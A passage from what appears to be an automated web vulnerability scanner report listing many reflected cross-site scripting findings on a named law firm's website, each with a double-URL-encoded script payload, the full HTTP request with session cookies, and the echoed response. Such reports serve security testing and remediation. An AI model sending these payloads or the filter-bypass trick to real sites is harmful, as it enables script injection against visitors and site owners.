<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui8c042"><script>alert(1)</script>e88d9eeae49/ui.dialog.css" value="">
...[SNIP]...

4.172. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 was submitted in the REST URL parameter 3. This input was echoed as bf81b"><script>alert(1)</script>ed17f52d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.dialog.cssbf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.dialog.cssbf81b"><script>alert(1)</script>ed17f52d89" value="">
...[SNIP]...

4.173. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0 was submitted in the REST URL parameter 1. This input was echoed as 5cb17"><script>alert(1)</script>e53ecb908c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0/ui/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css5cb17"><script>alert(1)</script>e53ecb908c0/ui/ui.progressbar.css" value="">
...[SNIP]...

4.174. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426 was submitted in the REST URL parameter 2. This input was echoed as 612ba"><script>alert(1)</script>8b00486b426 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui612ba"><script>alert(1)</script>8b00486b426/ui.progressbar.css" value="">
...[SNIP]...

4.175. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e was submitted in the REST URL parameter 3. This input was echoed as 13c9c"><script>alert(1)</script>4a99b88c02e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.progressbar.css13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.progressbar.css13c9c"><script>alert(1)</script>4a99b88c02e" value="">
...[SNIP]...

4.176. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be was submitted in the REST URL parameter 1. This input was echoed as 14fad"><script>alert(1)</script>9c0b0ee56be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be/ui/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css14fad"><script>alert(1)</script>9c0b0ee56be/ui/ui.resizable.css" value="">
...[SNIP]...

4.177. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda was submitted in the REST URL parameter 2. This input was echoed as 3fcda"><script>alert(1)</script>8c138520eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui3fcda"><script>alert(1)</script>8c138520eda/ui.resizable.css" value="">
...[SNIP]...

4.178. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 was submitted in the REST URL parameter 3. This input was echoed as f779c"><script>alert(1)</script>382088a8c20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.resizable.cssf779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.resizable.cssf779c"><script>alert(1)</script>382088a8c20" value="">
...[SNIP]...

4.179. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10 was submitted in the REST URL parameter 1. This input was echoed as c2d5f"><script>alert(1)</script>87253ed8d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssc2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10/ui/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssc2d5f"><script>alert(1)</script>87253ed8d10/ui/ui.slider.css" value="">
...[SNIP]...

4.180. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625 was submitted in the REST URL parameter 2. This input was echoed as 7d474"><script>alert(1)</script>1e1c925c625 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui7d474"><script>alert(1)</script>1e1c925c625/ui.slider.css" value="">
...[SNIP]...

4.181. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 was submitted in the REST URL parameter 3. This input was echoed as eb3ab"><script>alert(1)</script>de52d4ea844 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.slider.csseb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.slider.csseb3ab"><script>alert(1)</script>de52d4ea844" value="">
...[SNIP]...

4.182. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48 was submitted in the REST URL parameter 1. This input was echoed as e5847"><script>alert(1)</script>63b9f9dcf48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /csse5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48/ui/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/csse5847"><script>alert(1)</script>63b9f9dcf48/ui/ui.tabs.css" value="">
...[SNIP]...

4.183. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89 was submitted in the REST URL parameter 2. This input was echoed as 81a0d"><script>alert(1)</script>ee949bf1e89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui81a0d"><script>alert(1)</script>ee949bf1e89/ui.tabs.css" value="">
...[SNIP]...

4.184. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 was submitted in the REST URL parameter 3. This input was echoed as b92b8"><script>alert(1)</script>93dc2b44d56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.tabs.cssb92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.tabs.cssb92b8"><script>alert(1)</script>93dc2b44d56" value="">
...[SNIP]...

4.185. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d was submitted in the REST URL parameter 1. This input was echoed as f8b59"><script>alert(1)</script>b748a2e0a4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssf8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d/ui/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssf8b59"><script>alert(1)</script>b748a2e0a4d/ui/ui.theme.css" value="">
...[SNIP]...

4.186. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
